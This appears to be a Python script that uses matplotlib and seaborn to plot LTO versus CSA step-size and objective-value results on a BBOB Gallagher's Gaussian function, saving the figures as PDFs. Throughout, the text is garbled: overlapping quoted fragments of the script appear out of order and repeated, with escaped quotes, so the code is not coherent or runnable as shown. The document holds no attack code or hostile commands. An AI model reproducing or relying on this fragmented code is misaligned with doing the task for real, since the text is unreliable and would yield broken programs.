np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std", "costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"],", "= 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return", "CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path", "data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average", "= len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25,", "+ 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"],", "open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval =", "= 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] =", "data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"])", "os.path.isfile(path): return path else: raise argparse.ArgumentTypeError(\"readable_dir:%s is not a valid path to a", "the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\",", "json import numpy as np import seaborn as sns import matplotlib.pyplot as plt", "len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') 
plt.legend(loc=0, fontsize=25, ncol=2)", "import matplotlib.pyplot as plt import argparse from datetime import datetime sns.set() from matplotlib", "valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test", "'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6", "stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma", "* 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"])", "args.lto_path csa_path = args.csa_path function = args.function popsize = 10 data_LTO = {}", "plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations,", "to the LTO data file.\", default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data", "CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma", "label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs", "{} data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path)", "1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"],", "LTO\"]), 
color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"])", "LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\",", "sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] =", "plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function =", "LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma", "csa_path = args.csa_path function = args.function popsize = 10 data_LTO = {} data_CSA", "matplotlib.pyplot as plt import argparse from datetime import datetime sns.set() from matplotlib import", "data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std", "generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0,", "= {} data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with", "plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective", "+ 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path =", "= 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] =", "as plt import argparse from 
datetime import datetime sns.set() from matplotlib import rcParams", "Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\",", "= 10 data_LTO = {} data_CSA = {} with open(lto_path) as json_file: data_LTO", "rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width']", "len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma", "data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs", "data_CSA = {} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as", "plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time", "1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\")", "CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"])", "costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)),", "path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to", "color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp = datetime.now()", "data file.\", 
default=os.path.join(\"..\",\"examples\",\"10BBOB\",\"GallaghersGaussian21hi_LTO.json\")) parser.add_argument('--csa_path', type=dir_path, help=\"Path to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function',", "rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size']", "linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp", "parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path = args.lto_path csa_path", "a valid path to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO", "to a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path',", "= 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] =", "str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x',", "= parser.parse_args() lto_path = args.lto_path csa_path = args.csa_path function = args.function popsize =", "CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True)", "fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen *", "fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, 
stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen", "np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1,", "LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"])", "np import seaborn as sns import matplotlib.pyplot as plt import argparse from datetime", "= 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path):", "plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)]", "= 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] =", "os import json import numpy as np import seaborn as sns import matplotlib.pyplot", "costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"])", "rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor']", "6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6", "LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average", "plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] +", "plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, 
plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor')", "datetime import datetime sns.set() from matplotlib import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] =", "plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std", "which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1,", "gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs", "in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"],", "CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]),", "[str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma", "rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def dir_path(path): if os.path.isfile(path): return path else:", "the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args =", "{} with open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA", "* 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) +", 
"json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"])", "% (type, function, time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2)", "type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' %", "= 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color']", "in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"],", "FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10)", "costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1, len(data_LTO[\"Average costs", "np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1,", "CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1,", "color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"],", "datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time)) plt.savefig(os.path.join(output_path, plot_file),", "plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", 
fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function)", "os.makedirs(output_path, exist_ok=True) timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf' % (type,", "alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type", "function = args.function popsize = 10 data_LTO = {} data_CSA = {} with", "data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now()", "plt.legend() type = \"ObjectiveValue\" timestamp = datetime.now() time = str(timestamp) plot_file = ('Plot_%s_%s_%s.pdf'", "LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1, color=sns.xkcd_rgb[\"magenta\"]) plt.plot(list(np.arange(1,", "= False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor']", "rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k'", "rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize']", "0.5 rcParams['axes.linewidth'] = 3 rcParams['axes.edgecolor'] = 'k' rcParams['axes.grid.which'] = 'both' rcParams['legend.frameon'] = 'True'", "costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num", "step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), np.subtract(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]),", "= json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file) 
generations = len(data_LTO[\"Average costs", "CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args()", "import rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] =", "(16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] =", "CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4,", "+ [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1,", "[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average", "a file\"% path) parser = argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path,", "label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"StepSize\" output_path = os.path.join(\"..\",\"plots\") os.makedirs(output_path, exist_ok=True) timestamp =", "stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"]) + 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs", "data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args = parser.parse_args() lto_path", "+ 1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), 
np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs", "rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width'] = 1 rcParams['xtick.labelsize'] = 32 rcParams['ytick.labelsize'] = 32 def", "fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10,", "1)), np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]),", "len(data_CSA[\"Average costs CSA\"]) + 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type", "step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1,", "costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"],", "open(lto_path) as json_file: data_LTO = json.load(json_file) with open(csa_path) as json_file: data_CSA = json.load(json_file)", "FEval\", fontsize=50) plt.ylabel(\"Objective Value\", fontsize=50) plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen", "[str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.fill_between(list(np.arange(1, len(data_LTO[\"Average costs LTO\"])", "color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1,", "rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth']", "as sns import matplotlib.pyplot as plt import argparse from datetime import datetime sns.set()", "= args.csa_path function = args.function popsize = 10 
data_LTO = {} data_CSA =", "ncol=2) plt.xlabel(\"Num FEval\", fontsize=50) plt.ylabel(\"Step Size\", fontsize=50) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen", "\"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] =", "len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma", "LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma LTO\"],", "linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]),", "rcParams rcParams[\"font.size\"] = \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0,", "color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]),", "data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average", "plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average", "CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std", "len(data_LTO[\"Average costs LTO\"]) + 1)), data_LTO[\"Average costs LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average", "CSA\"], data_CSA[\"Std Sigma CSA\"]), 
color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"],", "rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size']", "30 rcParams['ytick.major.size'] = 32 rcParams['ytick.major.width'] = 6 rcParams['ytick.minor.size'] = 6 rcParams['ytick.minor.width'] = 1", "time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight') plt.clf() plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50)", "'both' rcParams['legend.frameon'] = 'True' rcParams['legend.framealpha'] = 1 rcParams['legend.fontsize'] = 30 rcParams['ytick.major.size'] = 32", "Sigma LTO\"]), np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) +", "+ 1)), np.subtract(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"],", "rcParams['ytick.minor.width'] = 1 rcParams['xtick.major.size'] = 32 rcParams['xtick.major.width'] = 6 rcParams['xtick.minor.size'] = 6 rcParams['xtick.minor.width']", "step=generations//5), [str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks()", "LTO\"], linewidth=4, label=\"LTO\", color=sns.xkcd_rgb[\"magenta\"]) plt.fill_between(list(np.arange(1, len(data_CSA[\"Average costs CSA\"]) + 1)), np.subtract(data_CSA[\"Average costs CSA\"],", "np.add(data_CSA[\"Sigma CSA\"], data_CSA[\"Std Sigma CSA\"]), color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma", "color=sns.xkcd_rgb[\"green\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_CSA[\"Sigma CSA\"]) + 1)), data_CSA[\"Sigma CSA\"], linewidth=4, label=\"CSA\", 
color=sns.xkcd_rgb[\"green\"]) plt.legend()", "json.load(json_file) generations = len(data_LTO[\"Average costs LTO\"]) num_feval = generations * popsize plt.tick_params(axis='x', which='minor')", "np.subtract(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), np.add(data_LTO[\"Average costs LTO\"], data_LTO[\"Std costs LTO\"]), alpha=0.1,", "'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon'] = True rcParams['figure.edgecolor'] = 'k' rcParams['grid.color'] =", "= \"40\" rcParams['text.usetex'] = False rcParams['font.family'] = 'serif' rcParams['figure.figsize'] = (16.0, 9.0) rcParams['figure.frameon']", "argparse.ArgumentParser(description='Script to plot LTO test data.') parser.add_argument('--lto_path', type=dir_path, help=\"Path to the LTO data", "np.add(data_LTO[\"Sigma LTO\"], data_LTO[\"Std Sigma LTO\"]), color=sns.xkcd_rgb[\"magenta\"], alpha=0.1) plt.plot(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) + 1)), data_LTO[\"Sigma", "CSA\"]), np.add(data_CSA[\"Average costs CSA\"], data_CSA[\"Std costs CSA\"]), alpha=0.1, color=sns.xkcd_rgb[\"green\"]) plt.plot(list(np.arange(1, len(data_CSA[\"Average costs CSA\"])", "10) for gen in np.arange(start=10, stop=generations, step=generations//5)]) plt.xticks() plt.title(function) plt.fill_between(list(np.arange(1, len(data_LTO[\"Sigma LTO\"]) +", "+ 1)), data_CSA[\"Average costs CSA\"], linewidth=4, label=\"CSA\", color=sns.xkcd_rgb[\"green\"]) plt.legend() type = \"ObjectiveValue\" timestamp", "plt.xscale(\"log\") plt.title(function) plt.xticks(np.arange(start=1, stop=generations, step=generations//5), [str(10)] + [str(gen * 10) for gen in", "to the CSA data file.\", default=os.path.join(\"..\",\"data\",\"PPSN_LTO_Data\",\"CSA_Data\",\"CSA_Plots_10D\",\"GallaghersGaussian21hi.json\")) parser.add_argument('--function', type=str, help=\"Function being plotted\", default=\"GallaghersGaussian21hi\") args", "time = str(timestamp) plot_file = 